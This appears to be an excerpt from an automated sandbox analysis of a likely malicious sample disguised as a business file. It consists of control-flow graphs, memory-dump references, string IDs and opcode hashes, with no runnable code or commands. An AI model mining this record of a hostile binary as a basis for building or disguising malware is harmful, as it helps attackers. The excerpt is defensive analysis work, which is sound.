                                          control_flow_graph 2494 10a5362-10a5364 2495 10a5366-10a53a0 2494->2495 2496 10a53c4-10a5484 call 10a41a0 call 10a3cc0 2494->2496 2497 10a53a2 2495->2497 2498 10a53a7-10a53c2 2495->2498 2508 10a548b-10a54a9 2496->2508 2509 10a5486 2496->2509 2497->2498 2498->2496 2539 10a54ac call 10a5658 2508->2539 2540 10a54ac call 10a5649 2508->2540 2509->2508 2510 10a54b2-10a54bd 2511 10a54bf 2510->2511 2512 10a54c4-10a54c8 2510->2512 2511->2512 2513 10a54ca-10a54cb 2512->2513 2514 10a54cd-10a54d4 2512->2514 2515 10a54ec-10a5530 2513->2515 2516 10a54db-10a54e9 2514->2516 2517 10a54d6 2514->2517 2521 10a5596-10a55ad 2515->2521 2516->2515 2517->2516 2523 10a55af-10a55d4 2521->2523 2524 10a5532-10a5548 2521->2524 2530 10a55ec 2523->2530 2531 10a55d6-10a55eb 2523->2531 2528 10a554a-10a5556 2524->2528 2529 10a5572 2524->2529 2532 10a5558-10a555e 2528->2532 2533 10a5560-10a5566 2528->2533 2534 10a5578-10a5595 2529->2534 2531->2530 2535 10a5570 2532->2535 2533->2535 2534->2521 2535->2534 2539->2510 2540->2510
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHq$PHq
                                          • API String ID: 0-1274609152
                                          • Opcode ID: 92f089078314b7b8a17413054eac2e500a6b37781e280a718a3c9ea07c45cfd8
                                          • Instruction ID: 08c8fe7151bd7301659fb57d20674dd3ba75deeda622659b0a7d9976919729d2
                                          • Opcode Fuzzy Hash: 92f089078314b7b8a17413054eac2e500a6b37781e280a718a3c9ea07c45cfd8
                                          • Instruction Fuzzy Hash: 6691D574E00218CFEB54CFA9D894A9DBBF2BF89300F5480AAE459AB365DB349945CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2541 10ad278-10ad2a8 2542 10ad2aa 2541->2542 2543 10ad2af-10ad38c call 10a41a0 call 10a3cc0 2541->2543 2542->2543 2553 10ad38e 2543->2553 2554 10ad393-10ad3b4 call 10a5658 2543->2554 2553->2554 2556 10ad3b9-10ad3c4 2554->2556 2557 10ad3cb-10ad3cf 2556->2557 2558 10ad3c6 2556->2558 2559 10ad3d1-10ad3d2 2557->2559 2560 10ad3d4-10ad3db 2557->2560 2558->2557 2561 10ad3f3-10ad437 2559->2561 2562 10ad3dd 2560->2562 2563 10ad3e2-10ad3f0 2560->2563 2567 10ad49d-10ad4b4 2561->2567 2562->2563 2563->2561 2569 10ad439-10ad44f 2567->2569 2570 10ad4b6-10ad4db 2567->2570 2574 10ad479 2569->2574 2575 10ad451-10ad45d 2569->2575 2576 10ad4dd-10ad4f2 2570->2576 2577 10ad4f3 2570->2577 2580 10ad47f-10ad49c 2574->2580 2578 10ad45f-10ad465 2575->2578 2579 10ad467-10ad46d 2575->2579 2576->2577 2581 10ad477 2578->2581 2579->2581 2580->2567 2581->2580
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHq$PHq
                                          • API String ID: 0-1274609152
                                          • Opcode ID: 4aab7ef55d0ad908a94f8135f46629237da8c155f7ad2cf9f9ea48c329576f8e
                                          • Instruction ID: 444dcecc51b483b37f262ce8b5079a7723303c90a51b92f9307b230e84866df4
                                          • Opcode Fuzzy Hash: 4aab7ef55d0ad908a94f8135f46629237da8c155f7ad2cf9f9ea48c329576f8e
                                          • Instruction Fuzzy Hash: A581A074E00218CFEB54DFEAD884A9DBBF2BF89300F5480A9E459AB365DB349945CF10

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2585 10aca08-10aca38 2587 10aca3a 2585->2587 2588 10aca3f-10acb1c call 10a41a0 call 10a3cc0 2585->2588 2587->2588 2598 10acb1e 2588->2598 2599 10acb23-10acb44 call 10a5658 2588->2599 2598->2599 2601 10acb49-10acb54 2599->2601 2602 10acb5b-10acb5f 2601->2602 2603 10acb56 2601->2603 2604 10acb61-10acb62 2602->2604 2605 10acb64-10acb6b 2602->2605 2603->2602 2606 10acb83-10acbc7 2604->2606 2607 10acb6d 2605->2607 2608 10acb72-10acb80 2605->2608 2612 10acc2d-10acc44 2606->2612 2607->2608 2608->2606 2614 10acbc9-10acbdf 2612->2614 2615 10acc46-10acc6b 2612->2615 2619 10acc09 2614->2619 2620 10acbe1-10acbed 2614->2620 2621 10acc6d-10acc82 2615->2621 2622 10acc83 2615->2622 2625 10acc0f-10acc2c 2619->2625 2623 10acbef-10acbf5 2620->2623 2624 10acbf7-10acbfd 2620->2624 2621->2622 2626 10acc07 2623->2626 2624->2626 2625->2612 2626->2625
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHq$PHq
                                          • API String ID: 0-1274609152
                                          • Opcode ID: b97a6fad52db81565283e90120d6869a283d6ccf9712d7f2978f50c69d6ce6a5
                                          • Instruction ID: daf3c7774aeab9f7060ccb496d2971f23d17fa4fd94b369bfcae85e05a6bb66e
                                          • Opcode Fuzzy Hash: b97a6fad52db81565283e90120d6869a283d6ccf9712d7f2978f50c69d6ce6a5
                                          • Instruction Fuzzy Hash: 7781B274E00218CFEB54DFAAD984A9DBBF2BF88300F55C069E459AB364DB359981CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2630 10accd8-10acd08 2631 10acd0a 2630->2631 2632 10acd0f-10acdec call 10a41a0 call 10a3cc0 2630->2632 2631->2632 2642 10acdee 2632->2642 2643 10acdf3-10ace14 call 10a5658 2632->2643 2642->2643 2645 10ace19-10ace24 2643->2645 2646 10ace2b-10ace2f 2645->2646 2647 10ace26 2645->2647 2648 10ace31-10ace32 2646->2648 2649 10ace34-10ace3b 2646->2649 2647->2646 2650 10ace53-10ace97 2648->2650 2651 10ace3d 2649->2651 2652 10ace42-10ace50 2649->2652 2656 10acefd-10acf14 2650->2656 2651->2652 2652->2650 2658 10ace99-10aceaf 2656->2658 2659 10acf16-10acf3b 2656->2659 2663 10aced9 2658->2663 2664 10aceb1-10acebd 2658->2664 2665 10acf3d-10acf52 2659->2665 2666 10acf53 2659->2666 2669 10acedf-10acefc 2663->2669 2667 10acebf-10acec5 2664->2667 2668 10acec7-10acecd 2664->2668 2665->2666 2670 10aced7 2667->2670 2668->2670 2669->2656 2670->2669
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHq$PHq
                                          • API String ID: 0-1274609152
                                          • Opcode ID: 306fac65aebcb242ea2effed72fbf390ddf2bd77a02d58a847285b60a6d9bab8
                                          • Instruction ID: b5500dda3c07b645a7542a6c6d107792066c89e0e6d9dac17640c1cb6df560b5
                                          • Opcode Fuzzy Hash: 306fac65aebcb242ea2effed72fbf390ddf2bd77a02d58a847285b60a6d9bab8
                                          • Instruction Fuzzy Hash: 0681D374E00218CFEB54DFAAD984A9DBBF2BF88300F55C0A9E459AB365DB345981CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2674 10ac738-10ac768 2675 10ac76a 2674->2675 2676 10ac76f-10ac84c call 10a41a0 call 10a3cc0 2674->2676 2675->2676 2686 10ac84e 2676->2686 2687 10ac853-10ac874 call 10a5658 2676->2687 2686->2687 2689 10ac879-10ac884 2687->2689 2690 10ac88b-10ac88f 2689->2690 2691 10ac886 2689->2691 2692 10ac891-10ac892 2690->2692 2693 10ac894-10ac89b 2690->2693 2691->2690 2694 10ac8b3-10ac8f7 2692->2694 2695 10ac89d 2693->2695 2696 10ac8a2-10ac8b0 2693->2696 2700 10ac95d-10ac974 2694->2700 2695->2696 2696->2694 2702 10ac8f9-10ac90f 2700->2702 2703 10ac976-10ac99b 2700->2703 2707 10ac939 2702->2707 2708 10ac911-10ac91d 2702->2708 2712 10ac99d-10ac9b2 2703->2712 2713 10ac9b3 2703->2713 2711 10ac93f-10ac95c 2707->2711 2709 10ac91f-10ac925 2708->2709 2710 10ac927-10ac92d 2708->2710 2714 10ac937 2709->2714 2710->2714 2711->2700 2712->2713 2714->2711
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHq$PHq
                                          • API String ID: 0-1274609152
                                          • Opcode ID: 0bfc01146ad067a53dbdefa7e0e81fe9475d8b78adaf8ba2167e9a4c65410c20
                                          • Instruction ID: c8029dce228a53e99b8321bf9f4dd06e60a9404222c7a6cc3d507afba4b8d40e
                                          • Opcode Fuzzy Hash: 0bfc01146ad067a53dbdefa7e0e81fe9475d8b78adaf8ba2167e9a4c65410c20
                                          • Instruction Fuzzy Hash: 7381A074E00218CFEB54DFAAD984B9DBBF2BF88300F55806AE459AB365DB349941CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHq$PHq
                                          • API String ID: 0-1274609152
                                          • Opcode ID: 7476be6b7c01b2beaf9d4def3c582841f630f358a47dd5c554079171e14293ae
                                          • Instruction ID: ac25d708f8da0412c5b14d59c9c1a501da31dc52cd57006940c706806df4c01c
                                          • Opcode Fuzzy Hash: 7476be6b7c01b2beaf9d4def3c582841f630f358a47dd5c554079171e14293ae
                                          • Instruction Fuzzy Hash: 4381A074E00218DFEB54DFEAD984A9DBBF2BF88300F548069E459AB365DB349981CF10
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c1d1cbe258d398bcf3ee14d11c3ce32811dcaefbcf0c51dbf725a8df232de96
                                          • Instruction ID: 87e8706ae1c0ccd3edf1371d8ae31d4b8aa38c9418d398b981d6b97480204242
                                          • Opcode Fuzzy Hash: 3c1d1cbe258d398bcf3ee14d11c3ce32811dcaefbcf0c51dbf725a8df232de96
                                          • Instruction Fuzzy Hash: 11226C74E00229CFDB54DFA9D884B9DBBB6BF84300F1481A9D449AB759DB349D81CF90
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0d88bcfd62010c6ad7cac404fa702f59f09923c794a803fe893cd8aca91ea1cf
                                          • Instruction ID: 0aabd2429243cf2d956e18bdce529fbc52555596598f8470e23393a3ef359409
                                          • Opcode Fuzzy Hash: 0d88bcfd62010c6ad7cac404fa702f59f09923c794a803fe893cd8aca91ea1cf
                                          • Instruction Fuzzy Hash: D172BE74E012298FDB64DF69C884BEDBBB2BB89300F5481EAD449A7355DB349E81CF50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff07ff3e297da791f428181e6bddbb3b7886507b4c4aaf0408d9b2f4240c5b33
                                          • Instruction ID: 35c9d8b7137143078c05630e92dd6639c1975e19330c8bd2804584db4b0b1cf7
                                          • Opcode Fuzzy Hash: ff07ff3e297da791f428181e6bddbb3b7886507b4c4aaf0408d9b2f4240c5b33
                                          • Instruction Fuzzy Hash: B1C1D274E01229CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB358DB359E85CF50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8e5e9e8afd02fb9f74316ee91ed05cbe2501eeb07770af955de615ee9f6c9a07
                                          • Instruction ID: a556f05187755463b83d1b75910ee2cf0a3a58dfddbd8ed1dd3210d56f014010
                                          • Opcode Fuzzy Hash: 8e5e9e8afd02fb9f74316ee91ed05cbe2501eeb07770af955de615ee9f6c9a07
                                          • Instruction Fuzzy Hash: E6C1A178E01218CFDB54DFA5D994B9DBBB2BF89300F2081A9D809A7358DB359E85CF50
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5c11b19dd31771ea02d3067aff335612e801dc6a0ec30f65ae3de081536049fb
                                          • Instruction ID: c37596127db4a92d1605b4d9e5feec69b54314f128730dac37e7be1acceb4aca
                                          • Opcode Fuzzy Hash: 5c11b19dd31771ea02d3067aff335612e801dc6a0ec30f65ae3de081536049fb
                                          • Instruction Fuzzy Hash: 3FA11570D00219CFEB14DFA9D948BDDBBB1FF88304F208269E408AB2A5DB759984CF55
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8ec0d1472b0d6b6cf71fdcb83a691375c696d11b215d34a6a89fca8cda637f12
                                          • Instruction ID: 41fe26d2d3d987cf5d8af42d4b9ff8f590360bb94e8395ba668887224bafe036
                                          • Opcode Fuzzy Hash: 8ec0d1472b0d6b6cf71fdcb83a691375c696d11b215d34a6a89fca8cda637f12
                                          • Instruction Fuzzy Hash: 6CA11370D00219CFEB14DFA9D988BDDBBB1FF89300F208269E408AB295DB759984CF54
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bc9566b31a9d11d07e91deb95b35c2702e3bb4fa9eaed57c84d4aefd16f9308d
                                          • Instruction ID: e2eb2b3c9008413b96b28b8b0705faa2c07f90545b9fbbd603143c72e549043a
                                          • Opcode Fuzzy Hash: bc9566b31a9d11d07e91deb95b35c2702e3bb4fa9eaed57c84d4aefd16f9308d
                                          • Instruction Fuzzy Hash: 46911570E00219CFEB50DFA8D888BEDBBB1FF49310F208259E409AB295DB759985CF54
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8ee3cd94da87fd20fbbe95bd3d4ad283ce10ad599384af11945569e0cd503315
                                          • Instruction ID: b87020b75ed0bb9b40aae66ec107df94a432244cfa50d346479c2febf2b1a32e
                                          • Opcode Fuzzy Hash: 8ee3cd94da87fd20fbbe95bd3d4ad283ce10ad599384af11945569e0cd503315
                                          • Instruction Fuzzy Hash: AB51A574E00308DFEB18DFAAD494A9DBBF2BF89300F648029E855AB364DB319845CF14
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a37223d933fe57b846cc4daf8e7caa3402f7213daf79fca70e6f2b5faa0074b
                                          • Instruction ID: 674a021067af25d85f95fed64accf77eaf561d7896f2fc936a62cee70847a33b
                                          • Opcode Fuzzy Hash: 3a37223d933fe57b846cc4daf8e7caa3402f7213daf79fca70e6f2b5faa0074b
                                          • Instruction Fuzzy Hash: 4751B974E00208DFDB18DFAAD494A9DBBF2BF89300F64C02AE855AB364DB319845CF14

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 10a76f1-10a7725 1 10a772b-10a774e 0->1 2 10a7b54-10a7b58 0->2 11 10a77fc-10a7800 1->11 12 10a7754-10a7761 1->12 3 10a7b5a-10a7b6e 2->3 4 10a7b71-10a7b7f 2->4 9 10a7bf0-10a7c05 4->9 10 10a7b81-10a7b96 4->10 18 10a7c0c-10a7c19 9->18 19 10a7c07-10a7c0a 9->19 20 10a7b98-10a7b9b 10->20 21 10a7b9d-10a7baa 10->21 15 10a7848-10a7851 11->15 16 10a7802-10a7810 11->16 25 10a7763-10a776e 12->25 26 10a7770 12->26 22 10a7c67 15->22 23 10a7857-10a7861 15->23 16->15 32 10a7812-10a782d 16->32 27 10a7c1b-10a7c56 18->27 19->27 28 10a7bac-10a7bed 20->28 21->28 33 10a7c6c-10a7c9c 22->33 23->2 29 10a7867-10a7870 23->29 34 10a7772-10a7774 25->34 26->34 76 10a7c5d-10a7c64 27->76 30 10a787f-10a788b 29->30 31 10a7872-10a7877 29->31 30->33 39 10a7891-10a7897 30->39 31->30 59 10a783b 32->59 60 10a782f-10a7839 32->60 61 10a7c9e-10a7cb4 33->61 62 10a7cb5-10a7cbc 33->62 34->11 41 10a777a-10a77dc 34->41 42 10a7b3e-10a7b42 39->42 43 10a789d-10a78ad 39->43 89 10a77de 41->89 90 10a77e2-10a77f9 41->90 42->22 49 10a7b48-10a7b4e 42->49 57 10a78af-10a78bf 43->57 58 10a78c1-10a78c3 43->58 49->2 49->29 63 10a78c6-10a78cc 57->63 58->63 64 10a783d-10a783f 59->64 60->64 63->42 70 10a78d2-10a78e1 63->70 64->15 71 10a7841 64->71 73 10a798f-10a79ba call 10a7538 * 2 70->73 74 10a78e7 70->74 71->15 91 10a79c0-10a79c4 73->91 92 10a7aa4-10a7abe 73->92 78 10a78ea-10a78fb 74->78 78->33 80 10a7901-10a7913 78->80 80->33 81 10a7919-10a7931 80->81 145 10a7933 call 10a80d8 81->145 146 10a7933 call 10a7f39 81->146 147 10a7933 call 10a7f3d 81->147 148 10a7933 call 10a7ef0 81->148 149 10a7933 call 10a7f31 81->149 150 10a7933 call 10a7f64 81->150 151 10a7933 call 10a7fa4 81->151 152 10a7933 call 10a7fe4 81->152 153 10a7933 call 10a8055 81->153 154 10a7933 call 10a7f35 81->154 85 10a7939-10a7949 85->42 88 10a794f-10a7952 85->88 93 10a795c-10a795f 88->93 94 10a7954-10a795a 88->94 89->90 90->11 91->42 95 10a79ca-10a79ce 91->95 92->2 112 10a7ac4-10a7ac8 92->112 93->22 96 10a7965-10a7968 93->96 94->93 94->96 99 10a79d0-10a79dd 95->99 100 10a79f6-10a79fc 95->100 101 10a796a-10a796e 96->101 102 10a7970-10a7973 96->102 115 10a79df-10a79ea 99->115 116 10a79ec 99->116 104 10a79fe-10a7a02 100->104 105 10a7a37-10a7a3d 100->105 101->102 103 10a7979-10a797d 101->103 102->22 102->103 103->22 110 10a7983-10a7989 103->110 104->105 111 10a7a04-10a7a0d 104->111 107 10a7a49-10a7a4f 105->107 108 10a7a3f-10a7a43 105->108 113 10a7a5b-10a7a5d 107->113 114 10a7a51-10a7a55 107->114 108->76 108->107 110->73 110->78 117 10a7a0f-10a7a14 111->117 118 10a7a1c-10a7a32 111->118 119 10a7aca-10a7ad4 call 10a63e0 112->119 120 10a7b04-10a7b08 112->120 121 10a7a5f-10a7a68 113->121 122 10a7a92-10a7a94 113->122 114->42 114->113 123 10a79ee-10a79f0 115->123 116->123 117->118 118->42 119->120 133 10a7ad6-10a7aeb 119->133 120->76 126 10a7b0e-10a7b12 120->126 129 10a7a6a-10a7a6f 121->129 130 10a7a77-10a7a8d 121->130 122->42 124 10a7a9a-10a7aa1 122->124 123->42 123->100 126->76 131 10a7b18-10a7b25 126->131 129->130 130->42 136 10a7b27-10a7b32 131->136 137 10a7b34 131->137 133->120 142 10a7aed-10a7b02 133->142 139 10a7b36-10a7b38 136->139 137->139 139->42 139->76 142->2 142->120 145->85 146->85 147->85 148->85 149->85 150->85 151->85 152->85 153->85 154->85
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                          • API String ID: 0-2212926057
                                          • Opcode ID: 34846e8909ebce46f2d7a5ed67a8a91232881a419aee3aebd668f75598f01e61
                                          • Instruction ID: 7428e5e77980c099ecc1aadaec22c73a7125f746e31106702c90f77a0095c66a
                                          • Opcode Fuzzy Hash: 34846e8909ebce46f2d7a5ed67a8a91232881a419aee3aebd668f75598f01e61
                                          • Instruction Fuzzy Hash: 96127B70A00209DFDB15CFA8D894AAEBBF2FF89310F948599E585DB261D732ED41CB50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2220 10a5f38-10a5f5a 2221 10a5f5c-10a5f60 2220->2221 2222 10a5f70-10a5f7b 2220->2222 2223 10a5f88-10a5f8f 2221->2223 2224 10a5f62-10a5f6e 2221->2224 2225 10a6023-10a604f 2222->2225 2226 10a5f81-10a5f83 2222->2226 2227 10a5faf-10a5fb8 2223->2227 2228 10a5f91-10a5f98 2223->2228 2224->2222 2224->2223 2233 10a6056-10a60ae 2225->2233 2229 10a601b-10a6020 2226->2229 2301 10a5fba call 10a5f38 2227->2301 2302 10a5fba call 10a5f29 2227->2302 2228->2227 2230 10a5f9a-10a5fa5 2228->2230 2232 10a5fab-10a5fad 2230->2232 2230->2233 2232->2229 2252 10a60bd-10a60cf 2233->2252 2253 10a60b0-10a60b6 2233->2253 2234 10a5fc0-10a5fc2 2235 10a5fca-10a5fd2 2234->2235 2236 10a5fc4-10a5fc8 2234->2236 2239 10a5fe1-10a5fe3 2235->2239 2240 10a5fd4-10a5fd9 2235->2240 2236->2235 2238 10a5fe5-10a6004 call 10a69a0 2236->2238 2246 10a6019 2238->2246 2247 10a6006-10a600f 2238->2247 2239->2229 2240->2239 2246->2229 2299 10a6011 call 10aaf5b 2247->2299 2300 10a6011 call 10aafad 2247->2300 2249 10a6017 2249->2229 2255 10a6163-10a6165 2252->2255 2256 10a60d5-10a60d9 2252->2256 2253->2252 2304 10a6167 call 10a6300 2255->2304 2305 10a6167 call 10a62f0 2255->2305 2257 10a60db-10a60e7 2256->2257 2258 10a60e9-10a60f6 2256->2258 2264 10a60f8-10a6102 2257->2264 2258->2264 2259 10a616d-10a6173 2262 10a617f-10a6186 2259->2262 2263 10a6175-10a617b 2259->2263 2265 10a617d 2263->2265 2266 10a61e1-10a6240 2263->2266 2269 10a612f-10a6133 2264->2269 2270 10a6104-10a6113 2264->2270 2265->2262 2279 10a6247-10a625e 2266->2279 2271 10a613f-10a6143 2269->2271 2272 10a6135-10a613b 2269->2272 2281 10a6123-10a612d 2270->2281 2282 10a6115-10a611c 2270->2282 2271->2262 2276 10a6145-10a6149 2271->2276 2274 10a6189-10a61da 2272->2274 2275 10a613d 2272->2275 2274->2266 2275->2262 2278 10a614f-10a6161 2276->2278 2276->2279 2278->2262 2281->2269 2282->2281 2299->2249 2300->2249 2301->2234 2302->2234 2304->2259 2305->2259
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Hq$Hq
                                          • API String ID: 0-925789375
                                          • Opcode ID: 1cbb19d8c9872dfb25c1fcc6c8238d43c76310877771f4d844cbc5fb49313662
                                          • Instruction ID: 3352d0c60f8104cc49f55e26162ff4398e9c675ce5ca838196ff0e1ebd2ee0ea
                                          • Opcode Fuzzy Hash: 1cbb19d8c9872dfb25c1fcc6c8238d43c76310877771f4d844cbc5fb49313662
                                          • Instruction Fuzzy Hash: D791D1707042158FDB269F68C854B6E7BF2BF89340F484569E4C68B395DB3ACC42CB91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2306 10a6498-10a64a5 2307 10a64ad-10a64af 2306->2307 2308 10a64a7-10a64ab 2306->2308 2310 10a66c0-10a66c7 2307->2310 2308->2307 2309 10a64b4-10a64bf 2308->2309 2311 10a66c8 2309->2311 2312 10a64c5-10a64cc 2309->2312 2315 10a66cd-10a66e0 2311->2315 2313 10a64d2-10a64e1 2312->2313 2314 10a6661-10a6667 2312->2314 2313->2315 2316 10a64e7-10a64f6 2313->2316 2317 10a6669-10a666b 2314->2317 2318 10a666d-10a6671 2314->2318 2327 10a6718-10a671a 2315->2327 2328 10a66e2-10a6705 2315->2328 2324 10a650b-10a650e 2316->2324 2325 10a64f8-10a64fb 2316->2325 2317->2310 2319 10a66be 2318->2319 2320 10a6673-10a6679 2318->2320 2319->2310 2320->2311 2321 10a667b-10a667e 2320->2321 2321->2311 2326 10a6680-10a6695 2321->2326 2329 10a651a-10a6520 2324->2329 2331 10a6510-10a6513 2324->2331 2325->2329 2330 10a64fd-10a6500 2325->2330 2345 10a66b9-10a66bc 2326->2345 2346 10a6697-10a669d 2326->2346 2332 10a672f-10a6736 2327->2332 2333 10a671c-10a672e 2327->2333 2347 10a670e-10a6712 2328->2347 2348 10a6707-10a670c 2328->2348 2340 10a6538-10a6555 2329->2340 2341 10a6522-10a6528 2329->2341 2334 10a6601-10a6607 2330->2334 2335 10a6506 2330->2335 2336 10a6566-10a656c 2331->2336 2337 10a6515 2331->2337 2351 10a6609-10a660f 2334->2351 2352 10a661f-10a6629 2334->2352 2342 10a662c-10a6639 2335->2342 2343 10a656e-10a6574 2336->2343 2344 10a6584-10a6596 2336->2344 2337->2342 2376 10a655e-10a6561 2340->2376 2349 10a652a 2341->2349 2350 10a652c-10a6536 2341->2350 2369 10a663b-10a663f 2342->2369 2370 10a664d-10a664f 2342->2370 2354 10a6578-10a6582 2343->2354 2355 10a6576 2343->2355 2371 10a6598-10a65a4 2344->2371 2372 10a65a6-10a65c9 2344->2372 2345->2310 2356 10a66af-10a66b2 2346->2356 2357 10a669f-10a66ad 2346->2357 2347->2327 2348->2327 2349->2340 2350->2340 2358 10a6613-10a661d 2351->2358 2359 10a6611 2351->2359 2352->2342 2354->2344 2355->2344 2356->2311 2364 10a66b4-10a66b7 2356->2364 2357->2311 2357->2356 2358->2352 2359->2352 2364->2345 2364->2346 2369->2370 2374 10a6641-10a6645 2369->2374 2375 10a6653-10a6656 2370->2375 2381 10a65f1-10a65ff 2371->2381 2372->2311 2383 10a65cf-10a65d2 2372->2383 2374->2311 2377 10a664b 2374->2377 2375->2311 2378 10a6658-10a665b 2375->2378 2376->2342 2377->2375 2378->2313 2378->2314 